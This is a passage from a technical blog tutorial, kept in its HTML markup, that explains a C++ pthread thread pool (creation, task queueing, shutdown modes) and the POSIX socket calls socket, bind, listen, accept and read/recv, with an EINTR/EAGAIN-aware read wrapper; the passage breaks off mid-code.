class="built_in">assert</span>(pool-&gt;task_queue_.<span class="built_in">size</span>() != <span class="number">0</span>);</span><br><span class="line">            task = pool-&gt;task_queue_.<span class="built_in">front</span>();</span><br><span class="line">            pool-&gt;task_queue_.<span class="built_in">pop</span>();</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Execute the task</span></span><br><span class="line">        (task.function)(task.arguments);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Note: UNREACHABLE, control flow can never get here</span></span><br><span class="line">    <span class="comment">// because a worker never leaves the loop; it terminates by executing the exit task</span></span><br><span class="line">    <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;TaskForWorkerThreads_ UNREACHABLE!&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-创建线程池">4. 
Creating the Thread Pool</h3><p>Creating the thread pool is fairly simple: just create the threads in a loop.</p><p>Note that the shutdown mode used when the pool is destroyed is also set here. The details are covered in the <strong>Destroying the Thread Pool</strong> part below.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">ThreadPool::<span class="built_in">ThreadPool</span>(<span class="type">size_t</span> threadNum, ShutdownMode shutdown_mode, <span class="type">size_t</span> maxQueueSize)</span><br><span class="line">        : <span class="built_in">threadNum_</span>(threadNum),</span><br><span class="line">          <span class="built_in">maxQueueSize_</span>(maxQueueSize), </span><br><span class="line">          <span class="comment">// Initialize threadpool_cond_ with the member variable threadpool_mutex_</span></span><br><span class="line">          <span class="built_in">threadpool_cond_</span>(threadpool_mutex_), </span><br><span class="line">          <span class="built_in">shutdown_mode_</span>(shutdown_mode)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Create the threads in a loop </span></span><br><span class="line">    <span class="keyword">while</span>(threads_.<span class="built_in">size</span>() &lt; threadNum_)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">pthread_t</span> thread;</span><br><span class="line">        <span class="comment">// 
If the thread was created successfully, store its handle in threads_</span></span><br><span class="line">        <span class="keyword">if</span>(!<span class="built_in">pthread_create</span>(&amp;thread, <span class="literal">nullptr</span>, TaskForWorkerThreads_, <span class="keyword">this</span>))</span><br><span class="line">        &#123;</span><br><span class="line">            threads_.<span class="built_in">push_back</span>(thread);</span><br><span class="line">            <span class="comment">// // Note: only the number of started threads is updated here</span></span><br><span class="line">            <span class="comment">// startedThreadNum_++;</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="5-添加事件">5. Adding Tasks</h3><p>Adding a new task requires taking the lock so that the task queue is not modified concurrently. Once the task has been queued, the condition variable is used to wake one idle worker thread to run it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">ThreadPool::appendTask</span><span class="params">(<span class="type">void</span> (*function)(<span class="type">void</span>*), <span class="type">void</span>* arguments)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// The task queue is modified, so the lock is required</span></span><br><span class="line">    <span class="function">MutexLockGuard <span 
class="title">guard</span><span class="params">(threadpool_mutex_)</span></span>;</span><br><span class="line">    <span class="comment">// If the queue already holds maxQueueSize_ tasks, drop the new task</span></span><br><span class="line">    <span class="keyword">if</span>(task_queue_.<span class="built_in">size</span>() &gt;= maxQueueSize_)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// Append the task to the queue</span></span><br><span class="line">        ThreadpoolTask task = &#123; function, arguments &#125;;</span><br><span class="line">        task_queue_.<span class="built_in">push</span>(task);</span><br><span class="line">        <span class="comment">// Each new task wakes only one waiting thread</span></span><br><span class="line">        threadpool_cond_.<span class="built_in">notify</span>();</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="6-销毁线程池">6. 
Destroying the Thread Pool</h3><p>When the thread pool is destroyed, the shutdown mode has to be checked.</p><p>Two shutdown modes are provided:</p><ol><li><p>IMMEDIATE_SHUTDOWN</p></li><li><p>GRACEFUL_QUIT</p></li></ol><p>In the first mode, the pool immediately discards every task still in the queue and then pushes as many <strong>exit tasks</strong> as there are threads. Each worker therefore <strong>finishes the task it is currently running and then executes an exit task</strong> to terminate.</p><blockquote><p>The <strong>exit task</strong> is shown below: each thread simply calls pthread_exit to terminate.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">auto</span> pthreadExit = [](<span class="type">void</span>*) &#123; <span class="built_in">pthread_exit</span>(<span class="number">0</span>); &#125;;</span><br></pre></td></tr></table></figure><p>In the second mode, the exit tasks are simply appended without discarding the tasks queued before them. The pool is then only really destroyed after <strong>all queued tasks have finished</strong>.</p><p>The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">ThreadPool::~<span class="built_in">ThreadPool</span>()</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 
Push the thread-exit tasks onto the task queue; the lock is required</span></span><br><span class="line">    <span class="comment">// Note: the mutex must be held before the condition variable is used</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// task_queue_ must only be touched with the lock held</span></span><br><span class="line">        <span class="function">MutexLockGuard <span class="title">guard</span><span class="params">(threadpool_mutex_)</span></span>;</span><br><span class="line">        <span class="comment">// If the pool has to shut down immediately,</span></span><br><span class="line">        <span class="keyword">if</span>(shutdown_mode_ == IMMEDIATE_SHUTDOWN)</span><br><span class="line">            <span class="comment">// first empty the current queue</span></span><br><span class="line">            <span class="keyword">while</span>(!task_queue_.<span class="built_in">empty</span>())</span><br><span class="line">                task_queue_.<span class="built_in">pop</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Push one thread-exit task per worker thread</span></span><br><span class="line">        <span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; threadNum_; i++)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">auto</span> pthreadExit = [](<span class="type">void</span>*) &#123; <span class="built_in">pthread_exit</span>(<span class="number">0</span>); &#125;;</span><br><span class="line">            ThreadpoolTask task = &#123; pthreadExit, <span class="literal">nullptr</span> &#125;;</span><br><span class="line">            task_queue_.<span class="built_in">push</span>(task);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Wake all threads so that they can run the exit tasks</span></span><br><span class="line">        threadpool_cond_.<span class="built_in">notifyAll</span>();</span><br><span class="line">    &#125;</span><br><span class="line">    <span 
class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; threadNum_; i++)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// Reclaim the thread's resources</span></span><br><span class="line">        <span class="built_in">pthread_join</span>(threads_[i], <span class="literal">nullptr</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-参考链接">7. References</h3><ul><li><p><a href="https://github.com/linyacool/WebServer">linyacool/WebServer - github</a></p></li><li><p><a href="https://blog.csdn.net/qq_36359022/article/details/78796784">线程池原理及C语言实现线程池 (Thread pool principles and a thread pool implementation in C)</a></p></li></ul><h2 id="三、网络连接">III. Network Connections</h2><h3 id="1-概述-2">1. Overview</h3><p>Setting up a complete network connection usually takes several calls to the <strong>socket family</strong> of functions.</p><p>To understand how these functions are used, I will explain each one as it comes up while writing the code below.</p><p>Note: the following is mainly based on the <strong>Linux/Posix manual pages</strong> (the <code>man</code> command really is a great thing XD).</p><h3 id="2-socket">2. socket</h3><ul><li><p>The socket function creates an endpoint for network communication, i.e. it creates a socket file descriptor (fd).</p></li><li><p>Its declaration is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Returns a new file descriptor on success; returns -1 and sets errno on failure</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">socket</span><span class="params">(<span class="type">int</span> 
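domain, <span class="type">int</span> type, <span class="type">int</span> protocol)</span></span>;</span><br></pre></td></tr></table></figure><p>For the domain parameter, we mainly use the following two values:</p><ul><li>AF_UNIX / AF_LOCAL: local communication, typically used for <strong>inter-process communication</strong>. Traffic never touches a network card, so it is much faster than AF_INET.</li><li>AF_INET: IPv4 communication; data goes through the network protocol stack (and a network card when the peer is remote).</li></ul><blockquote><p>IPv6, Bluetooth and other families are not covered here. One that surprised me is AF_VSOCK, which is used for communication between programs in a virtual machine and the host.</p></blockquote><p>For the type parameter, the commonly used values are:</p><ul><li><p>SOCK_STREAM: a connection-oriented byte stream (TCP under AF_INET)</p></li><li><p>SOCK_DGRAM: datagrams (UDP under AF_INET)</p></li><li><p>SOCK_NONBLOCK: makes the socket non-blocking. This is a Linux-specific flag that is OR-ed into type</p><blockquote><p><strong>Equivalent</strong> to setting O_NONBLOCK on the resulting file descriptor.</p></blockquote></li><li><p>SOCK_CLOEXEC: closes the file descriptor automatically when the process calls exec, so the newly executed program does not inherit it. This is also a Linux-specific flag that is OR-ed into type</p><blockquote><p>Equivalent to setting FD_CLOEXEC on the resulting file descriptor.</p></blockquote></li></ul><p>The protocol parameter selects a specific protocol for the socket. If the given protocol family has only one protocol that supports the requested socket type, protocol can be 0. If several protocols in the family support that socket type, protocol must be set to pick one.</p></li><li><p>A simple example: creating an IPv4 TCP socket (the most common case)</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> listen_fd = <span class="built_in">socket</span>(AF_INET, SOCK_STREAM, <span class="number">0</span>);</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-bind">3. 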
bind</h3><ul><li><p>A <strong>newly created</strong> socket (note: <strong>newly created</strong>) has no address assigned to it yet. The bind function assigns an address to the socket.</p><p>Note that if the socket is used (for example with connect or listen) without having been bound first, <strong>the operating system picks the address and port automatically</strong>. This is why the source port of many outgoing connections looks random: the OS chooses it behind the scenes.</p></li><li><p>The declaration of bind is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Returns 0 on success; returns -1 and sets errno on failure</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">bind</span><span class="params">(<span class="type">int</span> sockfd, <span class="type">const</span> <span class="keyword">struct</span> sockaddr *addr, <span class="type">socklen_t</span> addrlen)</span></span>;</span><br></pre></td></tr></table></figure><ul><li><p>The <strong>first parameter, sockfd</strong>, is the target socket file descriptor.</p></li><li><p>For the <strong>second parameter, addr</strong>, the rules and the concrete structure differ between address families.</p></li><li><p>The <strong>third parameter, addrlen</strong>, is the size of the structure that the <strong>second parameter addr</strong> points to.</p></li></ul><p>For AF_INET, the address format is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;netinet/in.h&gt;</span> <span class="comment">// ! Mind the header!</span></span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sockaddr_in</span> &#123;</span><br><span class="line">    <span class="type">sa_family_t</span>    sin_family; <span class="comment">/* address family: AF_INET */</span></span><br><span class="line">    <span class="type">in_port_t</span>      sin_port;   <span class="comment">/* port in network byte order */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">in_addr</span> sin_addr;   <span class="comment">/* internet address */</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Internet address. */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span>       s_addr;     <span class="comment">/* address in network byte order */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Here sin_family is always AF_INET, sin_port is set to the target port, and sin_addr holds <strong>the address to listen on</strong>.</p><p>One more remark: a modern machine may have several network interfaces, so setting sin_addr restricts listening to the interface that owns that address. To accept connections on <strong>all interfaces</strong>, use the macro <strong>INADDR_ANY</strong> (which is simply 0.0.0.0).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Address to accept any incoming messages.  
*/</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> INADDR_ANY  ((in_addr_t) 0x00000000)</span></span><br></pre></td></tr></table></figure><p>If the socket is bound to the loopback address 127.0.0.1 instead, it <strong>only receives requests that are sent to the loopback address</strong>; requests that reach this machine but target a non-loopback IP are not handled.</p><blockquote><p>Note: sin_port and sin_addr must both be stored in <strong>network byte order</strong> (i.e. big-endian).</p><p>The socket API provides helper functions for byte-order conversion (h stands for host, n for network; the s variants convert 16-bit values such as ports, the l variants 32-bit values such as IPv4 addresses).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Functions to convert between host and network byte order.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Please note that these functions normally take `unsigned long int&#x27; or</span></span><br><span class="line"><span class="comment">`unsigned short int&#x27; values as arguments and also return them.  But</span></span><br><span class="line"><span class="comment">this was a short-sighted decision since on different systems the types</span></span><br><span class="line"><span class="comment">may have different representations but the values are always the same.  
*/</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint32_t</span> <span class="title">ntohl</span> <span class="params">(<span class="type">uint32_t</span> __netlong)</span> __THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint16_t</span> <span class="title">ntohs</span> <span class="params">(<span class="type">uint16_t</span> __netshort)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint32_t</span> <span class="title">htonl</span> <span class="params">(<span class="type">uint32_t</span> __hostlong)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br><span class="line"><span class="function"><span class="keyword">extern</span> <span class="type">uint16_t</span> <span class="title">htons</span> <span class="params">(<span class="type">uint16_t</span> __hostshort)</span></span></span><br><span class="line"><span class="function">__THROW __<span class="title">attribute__</span> <span class="params">((__const__))</span></span>;</span><br></pre></td></tr></table></figure></blockquote></li></ul><blockquote><p>To convert between <strong>a network-byte-order IP address and its string form</strong>, see the following functions:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;netinet/in.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;arpa/inet.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">inet_aton</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp, <span class="keyword">struct</span> in_addr *inp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_addr</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_network</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *cp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">char</span> *<span class="title">inet_ntoa</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">in_addr</span> <span class="built_in">inet_makeaddr</span>(<span 
class="type">in_addr_t</span> net, <span class="type">in_addr_t</span> host);</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_lnaof</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">in_addr_t</span> <span class="title">inet_netof</span><span class="params">(<span class="keyword">struct</span> in_addr in)</span></span>;</span><br></pre></td></tr></table></figure></blockquote><p>For the AF_INET address family, a simple example of calling bind looks like this:</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Bind the port</span></span><br><span class="line">sockaddr_in server_addr;</span><br><span class="line"><span class="comment">// Zero-initialize the structure</span></span><br><span class="line"><span class="built_in">memset</span>(&amp;server_addr, <span class="string">&#x27;\0&#x27;</span>, <span class="built_in">sizeof</span>(server_addr));</span><br><span class="line"><span class="comment">// Fill in the basic fields</span></span><br><span class="line">server_addr.sin_family = AF_INET;</span><br><span class="line">server_addr.sin_port = <span class="built_in">htons</span>((<span class="type">unsigned</span> <span class="type">short</span>)port); <span class="comment">// sin_port is 16 bits wide, so use htons</span></span><br><span class="line">server_addr.sin_addr.s_addr = <span class="built_in">htonl</span>(INADDR_ANY);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 
Try to bind</span></span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">bind</span>(listen_fd, (sockaddr*)&amp;server_addr, <span class="built_in">sizeof</span>(server_addr)) == <span class="number">-1</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="number">-1</span>;</span><br></pre></td></tr></table></figure><h3 id="4-listen">4. listen</h3><p>The listen function puts the given socket fd into the <strong>listening state</strong>, i.e. it marks the socket as one that waits for incoming connections. Its prototype is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// Returns 0 on success; returns -1 and sets errno on failure</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">listen</span><span class="params">(<span class="type">int</span> sockfd, <span class="type">int</span> backlog)</span></span>;</span><br></pre></td></tr></table></figure><p>The function takes two parameters: sockfd is the target fd, and backlog is the maximum length of the queue of <strong>pending connections</strong>. If the queue is full, a new connection request may be refused (the client sees ECONNREFUSED); if the underlying protocol supports retransmission, the request may instead be ignored so that a later retry by the client succeeds.</p><h3 id="5-accept">5. 
accept</h3><ul><li><p>The accept function takes the first connection off the <strong>pending-connection queue of listen_fd</strong>, creates a new socket fd (the client fd) and returns it. All further interaction with that connection goes through this client fd.</p></li><li><p>Note that accept takes a pending connection from listen_fd and completes it; once that is done, a new client_fd is created. <strong>The original listen_fd is not changed in any way</strong>.</p></li><li><p>If listen_fd is <strong>blocking</strong> and the pending-connection queue is empty, <strong>the call to accept blocks</strong> until a new connection arrives.</p></li><li><p>Its prototype is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span>          <span class="comment">/* See NOTES */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/socket.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">accept</span><span class="params">(<span class="type">int</span> sockfd, <span class="keyword">struct</span> sockaddr *addr, <span class="type">socklen_t</span> *addrlen)</span></span>;</span><br></pre></td></tr></table></figure><ul><li>The first parameter is the listening socket, listen_fd</li><li>The second parameter is a pointer to a sockaddr structure; accept writes the <strong>address of the remote socket</strong> into it</li><li>The third parameter is a pointer to a variable <strong>holding the size of the sockaddr structure</strong>; on return it contains the actual size of the stored address.</li></ul></li></ul><h3 id="6-read-recv-write-send">6. read/recv &amp; write/send</h3><p>Because read/recv &amp; write/send involve <strong>blocking and non-blocking I/O</strong>, they need some extra error handling.</p><blockquote><p>Note that besides read/write, socket I/O can also use the send/recv family of functions, which is specific to socket communication.</p></blockquote><h4 id="a-错误码">a. 
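Error codes</h4><p>The <strong>most common errors</strong> returned by these functions are <strong>EINTR</strong> and <strong>EAGAIN</strong>; other errors are ignored for now. Specifically:</p><ul><li><p><strong>EINTR</strong>: typical of <strong>blocking</strong> operations; it indicates that the operation was <strong>interrupted</strong>.</p><p>If a process is blocked in a slow system call, catches a signal, and the signal handler returns, the system call <strong>is no longer blocked but interrupted</strong> and returns EINTR.</p><p>For read/write functions, the usual response to this error is to <strong>call the function again</strong>.</p></li><li><p><strong>EAGAIN</strong>: typical of <strong>non-blocking</strong> operations; it tells the caller to <strong>try again</strong> later.</p><p>For example:</p><ul><li>When sending a large amount of data in <strong>non-blocking</strong> mode, a full send buffer produces a Resource temporarily unavailable error and the call returns EAGAIN.</li><li>When reading in <strong>non-blocking</strong> mode and no data is available, the call does not block waiting for data but returns EAGAIN immediately.</li></ul><p>For read, the data depends on the <strong>remote peer</strong>, so on EAGAIN we stop reading and return immediately;</p><p>for write, the data is controlled by the <strong>local server</strong>, so we can keep retrying in a loop until everything has been written.</p></li></ul><p>Compared with read/write, recv/send document some additional socket-specific error codes, such as ECONNREFUSED, EPIPE and ECONNRESET. For debugging purposes, the read/write wrappers integrate both families of functions and use a bool parameter to choose between read/write and recv/send.</p><h4 id="b-阻塞-非阻塞-读取">b. Blocking / non-blocking reads</h4><p>For reads, blocking and non-blocking behavior differ as follows:</p><ul><li>When data is available, both behave the same: they read the data and <strong>return immediately</strong>.</li><li>When no data is available, a non-blocking read returns the EAGAIN error and can therefore <strong>return immediately</strong>, whereas a blocking read must block until data arrives.</li></ul><p>The read wrapper likewise uses a bool parameter to select blocking or non-blocking reads.</p><h4 id="c-返回值">c. Return values</h4><p>The return value of read/recv &amp; write/send:</p><ul><li>A negative value indicates an error</li><li>0 indicates that the <strong>connection has been closed</strong></li><li>A positive value is the number of bytes successfully read or sent</li></ul><h4 id="d-最终实现的代码">d. 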
Final implementation</h4><p>Putting this together, the wrapper around read/recv looks like this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">ssize_t</span> <span class="title">readn</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span>*buf, <span class="type">size_t</span> len, <span class="type">bool</span> isBlock, <span class="type">bool</span> isRead)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Cast void* to char* so the pointer can be advanced below</span></span><br><span class="line">    <span class="type">char</span> *pos = (<span 
class="type">char</span>*)buf;</span><br><span class="line">    <span class="type">size_t</span> leftNum = len;</span><br><span class="line">    <span class="type">ssize_t</span> readNum = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(leftNum &gt; <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> tmpRead = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// Read in a loop; on error, inspect errno below</span></span><br><span class="line">        <span class="comment">// Note: a return value of 0 from read means EOF, which is normal</span></span><br><span class="line">        <span class="keyword">if</span>(isRead)</span><br><span class="line">            tmpRead = <span class="built_in">read</span>(fd, pos, leftNum);</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            tmpRead = <span class="built_in">recv</span>(fd, pos, leftNum, (isBlock ? 
<span class="number">0</span> : MSG_DONTWAIT));</span><br><span class="line">        </span><br><span class="line">        <span class="keyword">if</span>(tmpRead &lt; <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(errno == EINTR)</span><br><span class="line">                <span class="keyword">continue</span>; <span class="comment">// interrupted by a signal: retry the call</span></span><br><span class="line">            <span class="comment">// No data available: return early, since this depends on the remote peer and the wait is unpredictable</span></span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span> (errno == EAGAIN)</span><br><span class="line">                <span class="keyword">return</span> readNum;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Reading 0 bytes means the remote peer has closed the connection</span></span><br><span class="line">        <span class="keyword">if</span>(tmpRead == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        readNum += tmpRead;</span><br><span class="line">        pos += tmpRead;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// In blocking mode, a short read means all available data has been read, so return</span></span><br><span class="line">        <span class="keyword">if</span>(isBlock &amp;&amp; <span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(tmpRead) &lt; leftNum)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">        leftNum -= tmpRead;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> readNum;</span><br><span 
